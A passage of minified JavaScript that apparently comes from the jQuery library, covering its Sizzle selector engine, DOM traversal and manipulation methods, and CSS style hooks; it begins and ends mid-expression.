RegExp("^"+P),PSEUDO:new RegExp("^"+H),POS:new RegExp(B,"i"),CHILD:new RegExp("^:(only|nth|first|last)-child(?:\\("+O+"*(even|odd|(([+-]|)(\\d*)n|)"+O+"*(?:([+-]|)"+O+"*(\\d+)|))"+O+"*\\)|)","i"),needsContext:new RegExp("^"+O+"*[>+~]|"+B,"i")},K=function(e){var t=g.createElement("div");try{return e(t)}catch(n){return!1}finally{t=null}},Q=K(function(e){return e.appendChild(g.createComment("")),!e.getElementsByTagName("*").length}),G=K(function(e){return e.innerHTML="<a href='#'></a>",e.firstChild&&typeof e.firstChild.getAttribute!==p&&e.firstChild.getAttribute("href")==="#"}),Y=K(function(e){e.innerHTML="<select></select>";var t=typeof e.lastChild.getAttribute("multiple");return t!=="boolean"&&t!=="string"}),Z=K(function(e){return e.innerHTML="<div class='hidden e'></div><div class='hidden'></div>",!e.getElementsByClassName||!e.getElementsByClassName("e").length?!1:(e.lastChild.className="e",e.getElementsByClassName("e").length===2)}),et=K(function(e){e.id=d+0,e.innerHTML="<a name='"+d+"'></a><div name='"+d+"'></div>",y.insertBefore(e,y.firstChild);var t=g.getElementsByName&&g.getElementsByName(d).length===2+g.getElementsByName(d+0).length;return r=!g.getElementById(d),y.removeChild(e),t});try{x.call(y.childNodes,0)[0].nodeType}catch(tt){x=function(e){var t,n=[];for(;t=this[e];e++)n.push(t);return n}}nt.matches=function(e,t){return nt(e,null,null,t)},nt.matchesSelector=function(e,t){return nt(t,null,null,[e]).length>0},s=nt.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(i===1||i===9||i===11){if(typeof e.textContent=="string")return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=s(e)}else if(i===3||i===4)return e.nodeValue}else for(;t=e[r];r++)n+=s(t);return n},o=nt.isXML=function(e){var t=e&&(e.ownerDocument||e).documentElement;return t?t.nodeName!=="HTML":!1},u=nt.contains=y.contains?function(e,t){var n=e.nodeType===9?e.documentElement:e,r=t&&t.parentNode;return e===r||!!(r&&r.nodeType===1&&n.contains&&n.contains(r))}:y.compareDocumentPosition?function(e,t){return t&&!!(e.compareDocumentPosition(t)&16)}:function(e,t){while(t=t.parentNode)if(t===e)return!0;return!1},nt.attr=function(e,t){var n,r=o(e);return r||(t=t.toLowerCase()),(n=i.attrHandle[t])?n(e):r||Y?e.getAttribute(t):(n=e.getAttributeNode(t),n?typeof e[t]=="boolean"?e[t]?t:null:n.specified?n.value:null:null)},i=nt.selectors={cacheLength:50,createPseudo:N,match:J,attrHandle:G?{}:{href:function(e){return e.getAttribute("href",2)},type:function(e){return e.getAttribute("type")}},find:{ID:r?function(e,t,n){if(typeof t.getElementById!==p&&!n){var r=t.getElementById(e);return r&&r.parentNode?[r]:[]}}:function(e,n,r){if(typeof n.getElementById!==p&&!r){var i=n.getElementById(e);return i?i.id===e||typeof i.getAttributeNode!==p&&i.getAttributeNode("id").value===e?[i]:t:[]}},TAG:Q?function(e,t){if(typeof t.getElementsByTagName!==p)return t.getElementsByTagName(e)}:function(e,t){var n=t.getElementsByTagName(e);if(e==="*"){var r,i=[],s=0;for(;r=n[s];s++)r.nodeType===1&&i.push(r);return i}return n},NAME:et&&function(e,t){if(typeof t.getElementsByName!==p)return t.getElementsByName(name)},CLASS:Z&&function(e,t,n){if(typeof t.getElementsByClassName!==p&&!n)return t.getElementsByClassName(e)}},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){return e[1]=e[1].replace($,""),e[3]=(e[4]||e[5]||"").replace($,""),e[2]==="~="&&(e[3]=" "+e[3]+" "),e.slice(0,4)},CHILD:function(e){return e[1]=e[1].toLowerCase(),e[1]==="nth"?(e[2]||nt.error(e[0]),e[3]=+(e[3]?e[4]+(e[5]||1):2*(e[2]==="even"||e[2]==="odd")),e[4]=+(e[6]+e[7]||e[2]==="odd")):e[2]&&nt.error(e[0]),e},PSEUDO:function(e){var t,n;if(J.CHILD.test(e[0]))return null;if(e[3])e[2]=e[3];else if(t=e[4])q.test(t)&&(n=ut(t,!0))&&(n=t.indexOf(")",t.length-n)-t.length)&&(t=t.slice(0,n),e[0]=e[0].slice(0,n)),e[2]=t;return e.slice(0,3)}},filter:{ID:r?function(e){return e=e.replace($,""),function(t){return t.getAttribute("id")===e}}:function(e){return e=e.replace($,""),function(t){var n=typeof t.getAttributeNode!==p&&t.getAttributeNode("id");return n&&n.value===e}},TAG:function(e){return e==="*"?function(){return!0}:(e=e.replace($,"").toLowerCase(),function(t){return t.nodeName&&t.nodeName.toLowerCase()===e})},CLASS:function(e){var t=k[d][e+" "];return t||(t=new RegExp("(^|"+O+")"+e+"("+O+"|$)"))&&k(e,function(e){return t.test(e.className||typeof e.getAttribute!==p&&e.getAttribute("class")||"")})},ATTR:function(e,t,n){return function(r,i){var s=nt.attr(r,e);return s==null?t==="!=":t?(s+="",t==="="?s===n:t==="!="?s!==n:t==="^="?n&&s.indexOf(n)===0:t==="*="?n&&s.indexOf(n)>-1:t==="$="?n&&s.substr(s.length-n.length)===n:t==="~="?(" "+s+" ").indexOf(n)>-1:t==="|="?s===n||s.substr(0,n.length+1)===n+"-":!1):!0}},CHILD:function(e,t,n,r){return e==="nth"?function(e){var t,i,s=e.parentNode;if(n===1&&r===0)return!0;if(s){i=0;for(t=s.firstChild;t;t=t.nextSibling)if(t.nodeType===1){i++;if(e===t)break}}return i-=r,i===n||i%n===0&&i/n>=0}:function(t){var n=t;switch(e){case"only":case"first":while(n=n.previousSibling)if(n.nodeType===1)return!1;if(e==="first")return!0;n=t;case"last":while(n=n.nextSibling)if(n.nodeType===1)return!1;return!0}}},PSEUDO:function(e,t){var n,r=i.pseudos[e]||i.setFilters[e.toLowerCase()]||nt.error("unsupported pseudo: "+e);return r[d]?r(t):r.length>1?(n=[e,e,"",t],i.setFilters.hasOwnProperty(e.toLowerCase())?N(function(e,n){var i,s=r(e,t),o=s.length;while(o--)i=T.call(e,s[o]),e[i]=!(n[i]=s[o])}):function(e){return r(e,0,n)}):r}},pseudos:{not:N(function(e){var t=[],n=[],r=a(e.replace(j,"$1"));return r[d]?N(function(e,t,n,i){var s,o=r(e,null,i,[]),u=e.length;while(u--)if(s=o[u])e[u]=!(t[u]=s)}):function(e,i,s){return t[0]=e,r(t,null,s,n),!n.pop()}}),has:N(function(e){return function(t){return nt(e,t).length>0}}),contains:N(function(e){return function(t){return(t.textContent||t.innerText||s(t)).indexOf(e)>-1}}),enabled:function(e){return e.disabled===!1},disabled:function(e){return e.disabled===!0},checked:function(e){var t=e.nodeName.toLowerCase();return t==="input"&&!!e.checked||t==="option"&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,e.selected===!0},parent:function(e){return!i.pseudos.empty(e)},empty:function(e){var t;e=e.firstChild;while(e){if(e.nodeName>"@"||(t=e.nodeType)===3||t===4)return!1;e=e.nextSibling}return!0},header:function(e){return X.test(e.nodeName)},text:function(e){var t,n;return e.nodeName.toLowerCase()==="input"&&(t=e.type)==="text"&&((n=e.getAttribute("type"))==null||n.toLowerCase()===t)},radio:rt("radio"),checkbox:rt("checkbox"),file:rt("file"),password:rt("password"),image:rt("image"),submit:it("submit"),reset:it("reset"),button:function(e){var t=e.nodeName.toLowerCase();return t==="input"&&e.type==="button"||t==="button"},input:function(e){return V.test(e.nodeName)},focus:function(e){var t=e.ownerDocument;return e===t.activeElement&&(!t.hasFocus||t.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},active:function(e){return e===e.ownerDocument.activeElement},first:st(function(){return[0]}),last:st(function(e,t){return[t-1]}),eq:st(function(e,t,n){return[n<0?n+t:n]}),even:st(function(e,t){for(var n=0;n<t;n+=2)e.push(n);return e}),odd:st(function(e,t){for(var n=1;n<t;n+=2)e.push(n);return e}),lt:st(function(e,t,n){for(var r=n<0?n+t:n;--r>=0;)e.push(r);return e}),gt:st(function(e,t,n){for(var r=n<0?n+t:n;++r<t;)e.push(r);return e})}},f=y.compareDocumentPosition?function(e,t){return e===t?(l=!0,0):(!e.compareDocumentPosition||!t.compareDocumentPosition?e.compareDocumentPosition:e.compareDocumentPosition(t)&4)?-1:1}:function(e,t){if(e===t)return l=!0,0;if(e.sourceIndex&&t.sourceIndex)return e.sourceIndex-t.sourceIndex;var n,r,i=[],s=[],o=e.parentNode,u=t.parentNode,a=o;if(o===u)return ot(e,t);if(!o)return-1;if(!u)return 1;while(a)i.unshift(a),a=a.parentNode;a=u;while(a)s.unshift(a),a=a.parentNode;n=i.length,r=s.length;for(var f=0;f<n&&f<r;f++)if(i[f]!==s[f])return ot(i[f],s[f]);return f===n?ot(e,s[f],-1):ot(i[f],t,1)},[0,0].sort(f),h=!l,nt.uniqueSort=function(e){var t,n=[],r=1,i=0;l=h,e.sort(f);if(l){for(;t=e[r];r++)t===e[r-1]&&(i=n.push(r));while(i--)e.splice(n[i],1)}return e},nt.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)},a=nt.compile=function(e,t){var n,r=[],i=[],s=A[d][e+" "];if(!s){t||(t=ut(e)),n=t.length;while(n--)s=ht(t[n]),s[d]?r.push(s):i.push(s);s=A(e,pt(i,r))}return s},g.querySelectorAll&&function(){var e,t=vt,n=/'|\\/g,r=/\=[\x20\t\r\n\f]*([^'"\]]*)[\x20\t\r\n\f]*\]/g,i=[":focus"],s=[":active"],u=y.matchesSelector||y.mozMatchesSelector||y.webkitMatchesSelector||y.oMatchesSelector||y.msMatchesSelector;K(function(e){e.innerHTML="<select><option selected=''></option></select>",e.querySelectorAll("[selected]").length||i.push("\\["+O+"*(?:checked|disabled|ismap|multiple|readonly|selected|value)"),e.querySelectorAll(":checked").length||i.push(":checked")}),K(function(e){e.innerHTML="<p test=''></p>",e.querySelectorAll("[test^='']").length&&i.push("[*^$]="+O+"*(?:\"\"|'')"),e.innerHTML="<input type='hidden'/>",e.querySelectorAll(":enabled").length||i.push(":enabled",":disabled")}),i=new RegExp(i.join("|")),vt=function(e,r,s,o,u){if(!o&&!u&&!i.test(e)){var a,f,l=!0,c=d,h=r,p=r.nodeType===9&&e;if(r.nodeType===1&&r.nodeName.toLowerCase()!=="object"){a=ut(e),(l=r.getAttribute("id"))?c=l.replace(n,"\\$&"):r.setAttribute("id",c),c="[id='"+c+"'] ",f=a.length;while(f--)a[f]=c+a[f].join("");h=z.test(e)&&r.parentNode||r,p=a.join(",")}if(p)try{return S.apply(s,x.call(h.querySelectorAll(p),0)),s}catch(v){}finally{l||r.removeAttribute("id")}}return t(e,r,s,o,u)},u&&(K(function(t){e=u.call(t,"div");try{u.call(t,"[test!='']:sizzle"),s.push("!=",H)}catch(n){}}),s=new RegExp(s.join("|")),nt.matchesSelector=function(t,n){n=n.replace(r,"='$1']");if(!o(t)&&!s.test(n)&&!i.test(n))try{var a=u.call(t,n);if(a||e||t.document&&t.document.nodeType!==11)return a}catch(f){}return nt(n,null,null,[t]).length>0})}(),i.pseudos.nth=i.pseudos.eq,i.filters=mt.prototype=i.pseudos,i.setFilters=new mt,nt.attr=v.attr,v.find=nt,v.expr=nt.selectors,v.expr[":"]=v.expr.pseudos,v.unique=nt.uniqueSort,v.text=nt.getText,v.isXMLDoc=nt.isXML,v.contains=nt.contains}(e);var nt=/Until$/,rt=/^(?:parents|prev(?:Until|All))/,it=/^.[^:#\[\.,]*$/,st=v.expr.match.needsContext,ot={children:!0,contents:!0,next:!0,prev:!0};v.fn.extend({find:function(e){var t,n,r,i,s,o,u=this;if(typeof e!="string")return v(e).filter(function(){for(t=0,n=u.length;t<n;t++)if(v.contains(u[t],this))return!0});o=this.pushStack("","find",e);for(t=0,n=this.length;t<n;t++){r=o.length,v.find(e,this[t],o);if(t>0)for(i=r;i<o.length;i++)for(s=0;s<r;s++)if(o[s]===o[i]){o.splice(i--,1);break}}return o},has:function(e){var t,n=v(e,this),r=n.length;return this.filter(function(){for(t=0;t<r;t++)if(v.contains(this,n[t]))return!0})},not:function(e){return this.pushStack(ft(this,e,!1),"not",e)},filter:function(e){return this.pushStack(ft(this,e,!0),"filter",e)},is:function(e){return!!e&&(typeof e=="string"?st.test(e)?v(e,this.context).index(this[0])>=0:v.filter(e,this).length>0:this.filter(e).length>0)},closest:function(e,t){var n,r=0,i=this.length,s=[],o=st.test(e)||typeof e!="string"?v(e,t||this.context):0;for(;r<i;r++){n=this[r];while(n&&n.ownerDocument&&n!==t&&n.nodeType!==11){if(o?o.index(n)>-1:v.find.matchesSelector(n,e)){s.push(n);break}n=n.parentNode}}return s=s.length>1?v.unique(s):s,this.pushStack(s,"closest",e)},index:function(e){return e?typeof e=="string"?v.inArray(this[0],v(e)):v.inArray(e.jquery?e[0]:e,this):this[0]&&this[0].parentNode?this.prevAll().length:-1},add:function(e,t){var n=typeof e=="string"?v(e,t):v.makeArray(e&&e.nodeType?[e]:e),r=v.merge(this.get(),n);return this.pushStack(ut(n[0])||ut(r[0])?r:v.unique(r))},addBack:function(e){return this.add(e==null?this.prevObject:this.prevObject.filter(e))}}),v.fn.andSelf=v.fn.addBack,v.each({parent:function(e){var t=e.parentNode;return t&&t.nodeType!==11?t:null},parents:function(e){return v.dir(e,"parentNode")},parentsUntil:function(e,t,n){return v.dir(e,"parentNode",n)},next:function(e){return at(e,"nextSibling")},prev:function(e){return at(e,"previousSibling")},nextAll:function(e){return v.dir(e,"nextSibling")},prevAll:function(e){return v.dir(e,"previousSibling")},nextUntil:function(e,t,n){return v.dir(e,"nextSibling",n)},prevUntil:function(e,t,n){return v.dir(e,"previousSibling",n)},siblings:function(e){return v.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return v.sibling(e.firstChild)},contents:function(e){return v.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:v.merge([],e.childNodes)}},function(e,t){v.fn[e]=function(n,r){var i=v.map(this,t,n);return nt.test(e)||(r=n),r&&typeof r=="string"&&(i=v.filter(r,i)),i=this.length>1&&!ot[e]?v.unique(i):i,this.length>1&&rt.test(e)&&(i=i.reverse()),this.pushStack(i,e,l.call(arguments).join(","))}}),v.extend({filter:function(e,t,n){return n&&(e=":not("+e+")"),t.length===1?v.find.matchesSelector(t[0],e)?[t[0]]:[]:v.find.matches(e,t)},dir:function(e,n,r){var i=[],s=e[n];while(s&&s.nodeType!==9&&(r===t||s.nodeType!==1||!v(s).is(r)))s.nodeType===1&&i.push(s),s=s[n];return i},sibling:function(e,t){var n=[];for(;e;e=e.nextSibling)e.nodeType===1&&e!==t&&n.push(e);return n}});var ct="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",ht=/ jQuery\d+="(?:null|\d+)"/g,pt=/^\s+/,dt=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,vt=/<([\w:]+)/,mt=/<tbody/i,gt=/<|&#?\w+;/,yt=/<(?:script|style|link)/i,bt=/<(?:script|object|embed|option|style)/i,wt=new RegExp("<(?:"+ct+")[\\s/>]","i"),Et=/^(?:checkbox|radio)$/,St=/checked\s*(?:[^=]|=\s*.checked.)/i,xt=/\/(java|ecma)script/i,Tt=/^\s*<!(?:\[CDATA\[|\-\-)|[\]\-]{2}>\s*$/g,Nt={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]},Ct=lt(i),kt=Ct.appendChild(i.createElement("div"));Nt.optgroup=Nt.option,Nt.tbody=Nt.tfoot=Nt.colgroup=Nt.caption=Nt.thead,Nt.th=Nt.td,v.support.htmlSerialize||(Nt._default=[1,"X<div>","</div>"]),v.fn.extend({text:function(e){return v.access(this,function(e){return e===t?v.text(this):this.empty().append((this[0]&&this[0].ownerDocument||i).createTextNode(e))},null,e,arguments.length)},wrapAll:function(e){if(v.isFunction(e))return this.each(function(t){v(this).wrapAll(e.call(this,t))});if(this[0]){var t=v(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstChild&&e.firstChild.nodeType===1)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return v.isFunction(e)?this.each(function(t){v(this).wrapInner(e.call(this,t))}):this.each(function(){var t=v(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=v.isFunction(e);return this.each(function(n){v(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){v.nodeName(this,"body")||v(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,!0,function(e){(this.nodeType===1||this.nodeType===11)&&this.appendChild(e)})},prepend:function(){return this.domManip(arguments,!0,function(e){(this.nodeType===1||this.nodeType===11)&&this.insertBefore(e,this.firstChild)})},before:function(){if(!ut(this[0]))return this.domManip(arguments,!1,function(e){this.parentNode.insertBefore(e,this)});if(arguments.length){var e=v.clean(arguments);return this.pushStack(v.merge(e,this),"before",this.selector)}},after:function(){if(!ut(this[0]))return this.domManip(arguments,!1,function(e){this.parentNode.insertBefore(e,this.nextSibling)});if(arguments.length){var e=v.clean(arguments);return this.pushStack(v.merge(this,e),"after",this.selector)}},remove:function(e,t){var n,r=0;for(;(n=this[r])!=null;r++)if(!e||v.filter(e,[n]).length)!t&&n.nodeType===1&&(v.cleanData(n.getElementsByTagName("*")),v.cleanData([n])),n.parentNode&&n.parentNode.removeChild(n);return this},empty:function(){var e,t=0;for(;(e=this[t])!=null;t++){e.nodeType===1&&v.cleanData(e.getElementsByTagName("*"));while(e.firstChild)e.removeChild(e.firstChild)}return this},clone:function(e,t){return e=e==null?!1:e,t=t==null?e:t,this.map(function(){return v.clone(this,e,t)})},html:function(e){return v.access(this,function(e){var n=this[0]||{},r=0,i=this.length;if(e===t)return n.nodeType===1?n.innerHTML.replace(ht,""):t;if(typeof e=="string"&&!yt.test(e)&&(v.support.htmlSerialize||!wt.test(e))&&(v.support.leadingWhitespace||!pt.test(e))&&!Nt[(vt.exec(e)||["",""])[1].toLowerCase()]){e=e.replace(dt,"<$1></$2>");try{for(;r<i;r++)n=this[r]||{},n.nodeType===1&&(v.cleanData(n.getElementsByTagName("*")),n.innerHTML=e);n=0}catch(s){}}n&&this.empty().append(e)},null,e,arguments.length)},replaceWith:function(e){return ut(this[0])?this.length?this.pushStack(v(v.isFunction(e)?e():e),"replaceWith",e):this:v.isFunction(e)?this.each(function(t){var n=v(this),r=n.html();n.replaceWith(e.call(this,t,r))}):(typeof e!="string"&&(e=v(e).detach()),this.each(function(){var t=this.nextSibling,n=this.parentNode;v(this).remove(),t?v(t).before(e):v(n).append(e)}))},detach:function(e){return this.remove(e,!0)},domManip:function(e,n,r){e=[].concat.apply([],e);var i,s,o,u,a=0,f=e[0],l=[],c=this.length;if(!v.support.checkClone&&c>1&&typeof f=="string"&&St.test(f))return this.each(function(){v(this).domManip(e,n,r)});if(v.isFunction(f))return this.each(function(i){var s=v(this);e[0]=f.call(this,i,n?s.html():t),s.domManip(e,n,r)});if(this[0]){i=v.buildFragment(e,this,l),o=i.fragment,s=o.firstChild,o.childNodes.length===1&&(o=s);if(s){n=n&&v.nodeName(s,"tr");for(u=i.cacheable||c-1;a<c;a++)r.call(n&&v.nodeName(this[a],"table")?Lt(this[a],"tbody"):this[a],a===u?o:v.clone(o,!0,!0))}o=s=null,l.length&&v.each(l,function(e,t){t.src?v.ajax?v.ajax({url:t.src,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0}):v.error("no ajax"):v.globalEval((t.text||t.textContent||t.innerHTML||"").replace(Tt,"")),t.parentNode&&t.parentNode.removeChild(t)})}return this}}),v.buildFragment=function(e,n,r){var s,o,u,a=e[0];return n=n||i,n=!n.nodeType&&n[0]||n,n=n.ownerDocument||n,e.length===1&&typeof a=="string"&&a.length<512&&n===i&&a.charAt(0)==="<"&&!bt.test(a)&&(v.support.checkClone||!St.test(a))&&(v.support.html5Clone||!wt.test(a))&&(o=!0,s=v.fragments[a],u=s!==t),s||(s=n.createDocumentFragment(),v.clean(e,n,s,r),o&&(v.fragments[a]=u&&s)),{fragment:s,cacheable:o}},v.fragments={},v.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,t){v.fn[e]=function(n){var r,i=0,s=[],o=v(n),u=o.length,a=this.length===1&&this[0].parentNode;if((a==null||a&&a.nodeType===11&&a.childNodes.length===1)&&u===1)return o[t](this[0]),this;for(;i<u;i++)r=(i>0?this.clone(!0):this).get(),v(o[i])[t](r),s=s.concat(r);return this.pushStack(s,e,o.selector)}}),v.extend({clone:function(e,t,n){var r,i,s,o;v.support.html5Clone||v.isXMLDoc(e)||!wt.test("<"+e.nodeName+">")?o=e.cloneNode(!0):(kt.innerHTML=e.outerHTML,kt.removeChild(o=kt.firstChild));if((!v.support.noCloneEvent||!v.support.noCloneChecked)&&(e.nodeType===1||e.nodeType===11)&&!v.isXMLDoc(e)){Ot(e,o),r=Mt(e),i=Mt(o);for(s=0;r[s];++s)i[s]&&Ot(r[s],i[s])}if(t){At(e,o);if(n){r=Mt(e),i=Mt(o);for(s=0;r[s];++s)At(r[s],i[s])}}return r=i=null,o},clean:function(e,t,n,r){var s,o,u,a,f,l,c,h,p,d,m,g,y=t===i&&Ct,b=[];if(!t||typeof t.createDocumentFragment=="undefined")t=i;for(s=0;(u=e[s])!=null;s++){typeof u=="number"&&(u+="");if(!u)continue;if(typeof u=="string")if(!gt.test(u))u=t.createTextNode(u);else{y=y||lt(t),c=t.createElement("div"),y.appendChild(c),u=u.replace(dt,"<$1></$2>"),a=(vt.exec(u)||["",""])[1].toLowerCase(),f=Nt[a]||Nt._default,l=f[0],c.innerHTML=f[1]+u+f[2];while(l--)c=c.lastChild;if(!v.support.tbody){h=mt.test(u),p=a==="table"&&!h?c.firstChild&&c.firstChild.childNodes:f[1]==="<table>"&&!h?c.childNodes:[];for(o=p.length-1;o>=0;--o)v.nodeName(p[o],"tbody")&&!p[o].childNodes.length&&p[o].parentNode.removeChild(p[o])}!v.support.leadingWhitespace&&pt.test(u)&&c.insertBefore(t.createTextNode(pt.exec(u)[0]),c.firstChild),u=c.childNodes,c.parentNode.removeChild(c)}u.nodeType?b.push(u):v.merge(b,u)}c&&(u=c=y=null);if(!v.support.appendChecked)for(s=0;(u=b[s])!=null;s++)v.nodeName(u,"input")?_t(u):typeof u.getElementsByTagName!="undefined"&&v.grep(u.getElementsByTagName("input"),_t);if(n){m=function(e){if(!e.type||xt.test(e.type))return r?r.push(e.parentNode?e.parentNode.removeChild(e):e):n.appendChild(e)};for(s=0;(u=b[s])!=null;s++)if(!v.nodeName(u,"script")||!m(u))n.appendChild(u),typeof u.getElementsByTagName!="undefined"&&(g=v.grep(v.merge([],u.getElementsByTagName("script")),m),b.splice.apply(b,[s+1,0].concat(g)),s+=g.length)}return b},cleanData:function(e,t){var n,r,i,s,o=0,u=v.expando,a=v.cache,f=v.support.deleteExpando,l=v.event.special;for(;(i=e[o])!=null;o++)if(t||v.acceptData(i)){r=i[u],n=r&&a[r];if(n){if(n.events)for(s in n.events)l[s]?v.event.remove(i,s):v.removeEvent(i,s,n.handle);a[r]&&(delete a[r],f?delete i[u]:i.removeAttribute?i.removeAttribute(u):i[u]=null,v.deletedIds.push(r))}}}}),function(){var e,t;v.uaMatch=function(e){e=e.toLowerCase();var t=/(chrome)[ \/]([\w.]+)/.exec(e)||/(webkit)[ \/]([\w.]+)/.exec(e)||/(opera)(?:.*version|)[ \/]([\w.]+)/.exec(e)||/(msie) ([\w.]+)/.exec(e)||e.indexOf("compatible")<0&&/(mozilla)(?:.*? rv:([\w.]+)|)/.exec(e)||[];return{browser:t[1]||"",version:t[2]||"0"}},e=v.uaMatch(o.userAgent),t={},e.browser&&(t[e.browser]=!0,t.version=e.version),t.chrome?t.webkit=!0:t.webkit&&(t.safari=!0),v.browser=t,v.sub=function(){function e(t,n){return new e.fn.init(t,n)}v.extend(!0,e,this),e.superclass=this,e.fn=e.prototype=this(),e.fn.constructor=e,e.sub=this.sub,e.fn.init=function(r,i){return i&&i instanceof v&&!(i instanceof e)&&(i=e(i)),v.fn.init.call(this,r,i,t)},e.fn.init.prototype=e.fn;var t=e(i);return e}}();var Dt,Pt,Ht,Bt=/alpha\([^)]*\)/i,jt=/opacity=([^)]*)/,Ft=/^(top|right|bottom|left)$/,It=/^(none|table(?!-c[ea]).+)/,qt=/^margin/,Rt=new RegExp("^("+m+")(.*)$","i"),Ut=new RegExp("^("+m+")(?!px)[a-z%]+$","i"),zt=new RegExp("^([-+])=("+m+")","i"),Wt={BODY:"block"},Xt={position:"absolute",visibility:"hidden",display:"block"},Vt={letterSpacing:0,fontWeight:400},$t=["Top","Right","Bottom","Left"],Jt=["Webkit","O","Moz","ms"],Kt=v.fn.toggle;v.fn.extend({css:function(e,n){return v.access(this,function(e,n,r){return r!==t?v.style(e,n,r):v.css(e,n)},e,n,arguments.length>1)},show:function(){return Yt(this,!0)},hide:function(){return Yt(this)},toggle:function(e,t){var n=typeof e=="boolean";return v.isFunction(e)&&v.isFunction(t)?Kt.apply(this,arguments):this.each(function(){(n?e:Gt(this))?v(this).show():v(this).hide()})}}),v.extend({cssHooks:{opacity:{get:function(e,t){if(t){var n=Dt(e,"opacity");return n===""?"1":n}}}},cssNumber:{fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":v.support.cssFloat?"cssFloat":"styleFloat"},style:function(e,n,r,i){if(!e||e.nodeType===3||e.nodeType===8||!e.style)return;var s,o,u,a=v.camelCase(n),f=e.style;n=v.cssProps[a]||(v.cssProps[a]=Qt(f,a)),u=v.cssHooks[n]||v.cssHooks[a];if(r===t)return u&&"get"in u&&(s=u.get(e,!1,i))!==t?s:f[n];o=typeof r,o==="string"&&(s=zt.exec(r))&&(r=(s[1]+1)*s[2]+parseFloat(v.css(e,n)),o="number");if(r==null||o==="number"&&isNaN(r))return;o==="number"&&!v.cssNumber[a]&&(r+="px");if(!u||!("set"in u)||(r=u.set(e,r,i))!==t)try{f[n]=r}catch(l){}},css:function(e,n,r,i){var s,o,u,a=v.camelCase(n);return n=v.cssProps[a]||(v.cssProps[a]=Qt(e.style,a)),u=v.cssHooks[n]||v.cssHooks[a],u&&"get"in u&&(s=u.get(e,!0,i)),s===t&&(s=Dt(e,n)),s==="normal"&&n in Vt&&(s=Vt[n]),r||i!==t?(o=parseFloat(s),r||v.isNumeric(o)?o||0:s):s},swap:function(e,t,n){var r,i,s={};for(i in t)s[i]=e.style[i],e.style[i]=t[i];r=n.call(e);for(i in t)e.style[i]=s[i];return r}}),e.getComputedStyle?Dt=function(t,n){var r,i,s,o,u=e.getComputedStyle(t,null),a=t.style;return u&&(r=u.getPropertyValue(n)||u[n],r===""&&!v.contains(t.ownerDocument,t)&&(r=v.style(t,n)),Ut.test(r)&&qt.test(n)&&(i=a.width,s=a.minWidth,o=a.maxWidth,a.minWidth=a.maxWidth=a.width=r,r=u.width,a.width=i,a.minWidth=s,a.maxWidth=o)),r}:i.documentElement.currentStyle&&(Dt=function(e,t){var n,r,i=e.currentStyle&&e.currentStyle[t],s=e.style;return i==null&&s&&s[t]&&(i=s[t]),Ut.test(i)&&!Ft.test(t)&&(n=s.left,r=e.runtimeStyle&&e.runtimeStyle.left,r&&(e.runtimeStyle.left=e.currentStyle.left),s.left=t==="fontSize"?"1em":i,i=s.pixelLeft+"px",s.left=n,r&&(e.runtimeStyle.left=r)),i===""?"auto":i}),v.each(["height","width"],function(e,t){v.cssHooks[t]={get:function(e,n,r){if(n)return e.offsetWidth===0&&It.test(Dt(e,"display"))?v.swap(e,Xt,function(){return tn(e,t,r)}):tn(e,t,r)},set:function(e,n,r){return Zt(e,n,r?en(e,t,r,v.support.boxSizing&&v.css(e,"boxSizing")==="border-box"):0)}}}),v.support.opacity||(v.cssHooks.opacity={get:function(e,t){return jt.test((t&&e.currentStyle?e.currentStyle.filter:e.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":t?"1":""},set:function(e,t){var n=e.style,r=e.currentStyle,i=v.isNumeric(t)?"alpha(opacity="+t*100+")":"",s=r&&r.filter||n.filter||"";n.zoom=1;if(t>=1&&v.trim(s.replace(Bt,""))===""&&n.removeAttribute){n.removeAttribute("filter");if(r&&!r.filter)return}n.filter=Bt.test(s)?s.replace(Bt,i):s+" "+i}}),v(function(){v.support.reliableMarginRight||(v.cssHooks.marginRight={get:function(e,t){return v.swap(e,{display:"inline-block"},function(){if(t)return Dt(e,"marginRight")})}}),!v.support.pixelPosition&&v.fn.position&&v.each(["top","left"],function(e,t){v.cssHooks[t]={get:function(e,n){if(n){var r=Dt(e,t);return Ut.test(r)?v(e).position()[t]+"px":r}}}})}),v.expr&&v.expr.filters&&(v.expr.filters.hidden=function(e){return e.offsetWidth===0&&e.offsetHeight===0||!v.support.reliableHiddenOffsets&&(e.style&&e.style.display||Dt(e,"display"))==="none"},v.expr.filters.visible=function(e){return!v.expr.filters.hidden(e)}),v.each({margin:"",padding:"",border:"Width"},function(e,t){v.cssHooks[e+t]={expand:function(n){var r,i=typeof n=="string"?n.split(" "):[n],s={};for(r=0;r<4;r++)s[e+$t[r]+t]=i[r]||i[r-2]||i[0];return s}},qt.test(e)||(v.cssHooks[e+t].set=Zt)});var 